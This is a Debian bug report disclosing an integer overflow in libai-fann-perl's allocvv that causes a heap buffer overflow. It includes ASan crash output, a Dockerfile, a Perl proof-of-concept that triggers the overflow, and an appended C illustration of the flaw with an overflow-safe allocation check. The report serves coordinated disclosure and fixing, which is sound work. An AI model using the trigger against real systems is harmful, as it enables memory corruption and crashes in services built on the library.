Package: libai-fann-perl
Severity: normal

Dear Maintainer,

As a part of an academic project, we have discovered an integer overflow which can lead to a heap buffer overflow in the libai-fann-perl package. The vulnerability lies in morefann.c:allocvv, where two user-controlled integers are used in a multiplication. These integers are not checked for upper bounds and can therefore overflow the integer space and wrap around to a small value. The result of this multiplication is used to allocate a buffer on the heap. Therefore, this integer overflow could lead to a very small buffer being allocated. Since this buffer is then written to in a loop, this ends up in a heap buffer overflow situation.

I have attached a Dockerfile and a Perl script that recreate this vulnerability. The output on running the Docker image built from this Dockerfile should be as follows.

=================================================================
==7==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000017150 at pc 0x7f99639ea055 bp 0x7ffd6582e560 sp 0x7ffd6582e558
WRITE of size 8 at 0x602000017150 thread T0
    #0 0x7f99639ea054 (/usr/local/lib/x86_64-linux-gnu/perl/5.26.1/auto/AI/FANN/FANN.so+0xf054)
    #1 0x559c976ef440 (/usr/bin/perl+0xdc440)
    #2 0x559c976e7265 (/usr/bin/perl+0xd4265)
    #3 0x559c97668396 (/usr/bin/perl+0x55396)
    #4 0x559c9763f491 (/usr/bin/perl+0x2c491)
    #5 0x7f99672e5b96 (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    #6 0x559c9763f4d9 (/usr/bin/perl+0x2c4d9)

0x602000017151 is located 0 bytes to the right of 1-byte region [0x602000017150,0x602000017151)
allocated by thread T0 here:
    #0 0x7f9967f7b6d0 (/usr/lib/llvm-6.0/lib/clang/6.0.0/lib/linux/libclang_rt.asan-x86_64.so+0x1056d0)
    #1 0x7f99639f7086 (/usr/local/lib/x86_64-linux-gnu/perl/5.26.1/auto/AI/FANN/FANN.so+0x1c086)

SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/lib/x86_64-linux-gnu/perl/5.26.1/auto/AI/FANN/FANN.so+0xf054)
Shadow bytes around the buggy address:
  0x0c047fffadd0: fa fa fd fd fa fa 00 02 fa fa fd fd fa fa fd fd
  0x0c047fffade0: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd
  0x0c047fffadf0: fa fa fd fd fa fa 00 02 fa fa fd fd fa fa fd fd
  0x0c047fffae00: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 04
  0x0c047fffae10: fa fa fd fd fa fa 00 04 fa fa 00 04 fa fa fd fd
=>0x0c047fffae20: fa fa fd fd fa fa 00 04 fa fa[01]fa fa fa fd fd
  0x0c047fffae30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffae40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffae50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffae60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffae70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==7==ABORTING

Please investigate this issue.

-- System Information:
Debian Release: buster/sid
  APT prefers bionic-updates
  APT policy: (500, 'bionic-updates'), (500, 'bionic-security'), (500, 'bionic'), (100, 'bionic-backports')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 4.15.0-74-generic (SMP w/4 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages libai-fann-perl depends on:
ii  libc6                       2.27-3ubuntu1
pn  libfann2                    <none>
ii  perl                        5.26.1-6ubuntu0.3
ii  perl-base [perlapi-5.26.1]  5.26.1-6ubuntu0.3

libai-fann-perl recommends no packages.

libai-fann-perl suggests no packages.
Dockerfile:

FROM ubuntu:18.04
RUN apt-get update
RUN apt-get -y install perl clang wget libfann-dev
WORKDIR /tmp
RUN wget http://deb.debian.org/debian/pool/main/liba/libai-fann-perl/libai-fann-perl_0.10.orig.tar.gz
RUN tar -xvf libai-fann-perl_0.10.orig.tar.gz
WORKDIR /tmp/AI-FANN-0.10/
RUN perl Makefile.PL CC=clang CCCDLFLAGS='-fsanitize=address -fPIC' LD=clang LDDLFLAGS='-fsanitize=address -shared -L/usr/local/lib -fstack-protector-strong -shared-libasan'
RUN make
RUN make install
WORKDIR /tmp/
COPY ./run.pl /tmp/run.pl
CMD LD_PRELOAD=/usr/lib/llvm-6.0/lib/clang/6.0.0/lib/linux/libclang_rt.asan-x86_64.so perl /tmp/run.pl
run.pl:

#!/usr/bin/perl
use AI::FANN qw(:all);

# 65536 rows of 65536 inputs: num_data * num_input is 2^32, which does not
# fit in a 32-bit int, so the product used by allocvv to size the input
# buffer wraps around and a much smaller buffer is allocated.
my $n = 65536;
my $train = AI::FANN::TrainData->new_empty($n, $n, 1);

# Writing a single full row of $n inputs then runs past that buffer.
my @values = (0..$n-1);
$train->data($_, [@values], 1);
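The following C is an added illustration, not code from this report or from AI::FANN, of the defect class described above and of the check that prevents it. `naive_vv_count`, `checked_vv_bytes` and `alloc_vv_safe` are hypothetical names chosen for the example; the real allocvv in morefann.c is not reproduced here. The unchecked version multiplies two caller-controlled counts in 32-bit arithmetic, so 65536 * 65536 wraps to 0; the checked version widens to size_t and refuses any product that would wrap, returning 0 so that the caller can never proceed to fill a buffer smaller than rows * cols cells.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical stand-in for the unchecked pattern the report describes
 * (not the actual morefann.c code): two caller-controlled counts are
 * multiplied in 32-bit unsigned arithmetic and the product sizes a heap
 * buffer. 65536 * 65536 = 2^32 wraps to 0, so the buffer allocated from
 * this count is far smaller than the loop that later fills it expects. */
unsigned int naive_vv_count(unsigned int rows, unsigned int cols)
{
    return rows * cols; /* wraps modulo 2^32 */
}

/* Overflow-safe byte count for a rows x cols matrix of elem_size-byte
 * cells. Returns 0 when any factor is 0 or when the product would not fit
 * in size_t, so a 0 result always means "do not allocate". */
size_t checked_vv_bytes(size_t rows, size_t cols, size_t elem_size)
{
    if (rows == 0 || cols == 0 || elem_size == 0)
        return 0;
    if (rows > SIZE_MAX / cols)        /* rows * cols would wrap */
        return 0;
    size_t cells = rows * cols;
    if (cells > SIZE_MAX / elem_size)  /* cells * elem_size would wrap */
        return 0;
    return cells * elem_size;
}

/* Allocates rows * cols doubles, or returns NULL when the size computation
 * is refused or the allocator cannot satisfy the request. The caller must
 * treat NULL as failure rather than handing it to a fill loop. */
double *alloc_vv_safe(size_t rows, size_t cols)
{
    size_t bytes = checked_vv_bytes(rows, cols, sizeof(double));
    return bytes ? malloc(bytes) : NULL;
}

int main(void)
{
    /* The report's shape: 65536 x 65536 inputs. */
    printf("32-bit product of 65536 * 65536: %u\n",
           naive_vv_count(65536u, 65536u));
    printf("checked byte count for 65536 x 65536 doubles: %zu\n",
           checked_vv_bytes(65536, 65536, sizeof(double)));

    /* A request that cannot be represented even in size_t is refused. */
    printf("SIZE_MAX x 2 cells refused: %s\n",
           checked_vv_bytes(SIZE_MAX, 2, 1) == 0 ? "yes" : "no");

    double *m = alloc_vv_safe(4, 3);
    printf("4 x 3 allocation: %s\n", m ? "ok" : "failed");
    free(m);
    return 0;
}
```

On a 64-bit build the checked path accepts the report's 65536 x 65536 request (2^40 bytes for doubles) and malloc itself then decides whether that much memory exists; the important property is that the size passed to the allocator is never smaller than what the fill loop will write, and that a NULL return is checked rather than dereferenced.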